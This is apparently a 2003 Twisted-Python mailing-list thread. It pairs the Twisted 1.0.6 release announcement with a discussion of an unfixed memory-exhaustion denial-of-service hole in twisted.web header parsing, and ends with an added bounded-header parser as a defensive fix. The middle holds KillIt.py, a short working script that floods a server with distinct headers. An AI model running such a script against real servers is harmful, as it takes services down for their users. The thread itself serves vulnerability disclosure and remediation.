[Twisted-Python] ANN: Twisted 1.0.6 (includes security fixes)
IMPORTANT: This release includes security updates to twisted.web. It is strongly recommended that you upgrade to this version of Twisted.

Twisted is an event-driven networking framework for server and client applications. For more information, visit http://www.twistedmatrix.com, join the list http://twistedmatrix.com/cgi-bin/mailman/listinfo/twisted-python or visit us on #twisted at irc.freenode.net.

What's New in 1.0.6
===================

- Security fixes for twisted.web.
- Cred, Twisted's unified authentication and authorization framework, was rewritten. While still not stable, the new system is far superior and developers are encouraged to start using it.
- Flow, a utility package for integrating asynchronous control flow with generators and iterators.
- Many improvements to the UDP subsystem.
- Many Windows-specific networking bug fixes.
- Cleanups in Woven - outputted HTML no longer includes attributes used by templating, removed fake-acquisition for templates.
- Support switching over to TLS from TCP connections (useful for e.g. STARTTLS in SMTP.)
- Improvements to the mail protocols and infrastructure.
- Fixed 2.2.0 compatibility.
- Index support for Lore.
- Bug fixes, documentation updates and small feature improvements.
Itamar Shtull-Trauring:
Was the out-of-memory denial of service attack fixed?
http://www.twistedmatrix.com/pipermail/twisted-python/2003-June/004462.html

Looking at the code, it looks like I can still keep adding headers until the machine exhausts memory

    def headerReceived(self, line):
        """Do pre-processing (for content-length) and store this header away.
        """
        header, data = line.split(':', 1)
        header = header.lower()
        data = data.strip()
        if header == 'content-length':
            self.length = int(data)
        self.requests[-1].received_headers[header] = data

Andrew
dalke@dalkescientific.com
Me:
Err, that code doesn't actually work (it reuses the same header names, so there isn't a memory problem). Here's some real attack code

===== KillIt.py
import socket

class KillIt:
    def __init__(self, where):
        self.f = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.f.connect(where)
        self.f.send("GET / HTTP/1.1\r\n")
        self.n = 0

    def kill(self):
        factor = 1000000
        for i in range(self.n*factor, (self.n+1)*factor):
            self.f.send("%s: X\r\n" % i)
            if i%1000 == 0:
                print i
        self.n += 1
=======
Andrew
On Tue, 1 Jul 2003 19:52:07 +0200 Andrew Dalke <dalke@dalkescientific.com> wrote:
> Was the out-of-memory denial of service attack fixed?
No, we fixed a more serious security bug :/

Going through http code and fixing all the DoS issues is on my todo list.

-- 
Itamar Shtull-Trauring    http://itamarst.org/
http://www.zoteca.com -- Python & Twisted consulting
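The defect the thread describes is a header store that grows with every distinct header name a client sends. The following is an added example of a bounded header accumulator written for this page; it is not Twisted's code, and the limit values, the class and function names, and the 'rejected' convention are assumptions.

```python
MAX_HEADER_COUNT = 100        # assumed cap on distinct header names
MAX_HEADER_BYTES = 16 * 1024  # assumed cap on total header bytes per request


class HeaderLimitExceeded(Exception):
    """Raised when a client sends more header data than the server allows."""


class BoundedHeaders:
    """Stores request headers like the quoted headerReceived(), but counts
    both distinct names and raw bytes so neither can grow without bound."""

    def __init__(self, max_count=MAX_HEADER_COUNT, max_bytes=MAX_HEADER_BYTES):
        self.max_count = max_count
        self.max_bytes = max_bytes
        self.received_headers = {}
        self.header_bytes = 0
        self.length = None

    def header_received(self, line):
        # Charge every byte on the wire before parsing, so a line costs the
        # same whether its name is new or a repeat of an earlier one.
        self.header_bytes += len(line)
        if self.header_bytes > self.max_bytes:
            raise HeaderLimitExceeded("header block exceeds %d bytes" % self.max_bytes)
        if ':' not in line:
            raise ValueError("malformed header line: %r" % line)
        header, data = line.split(':', 1)
        header = header.strip().lower()
        data = data.strip()
        if header not in self.received_headers and len(self.received_headers) >= self.max_count:
            raise HeaderLimitExceeded("more than %d distinct headers" % self.max_count)
        if header == 'content-length':
            if not data.isdigit():
                raise ValueError("bad content-length: %r" % data)
            self.length = int(data)
        self.received_headers[header] = data


def parse_header_block(lines, **limits):
    """Feed header lines in order; return ('ok', headers) or ('rejected', reason).
    'rejected' is where a server should answer 400 and close the connection."""
    parser = BoundedHeaders(**limits)
    try:
        for line in lines:
            parser.header_received(line)
    except (HeaderLimitExceeded, ValueError) as exc:
        return ('rejected', str(exc))
    return ('ok', parser.received_headers)
```

Feeding it the "new name on every line" pattern from the thread trips the count limit after 100 names, while repeating one name with a large value trips the byte limit instead.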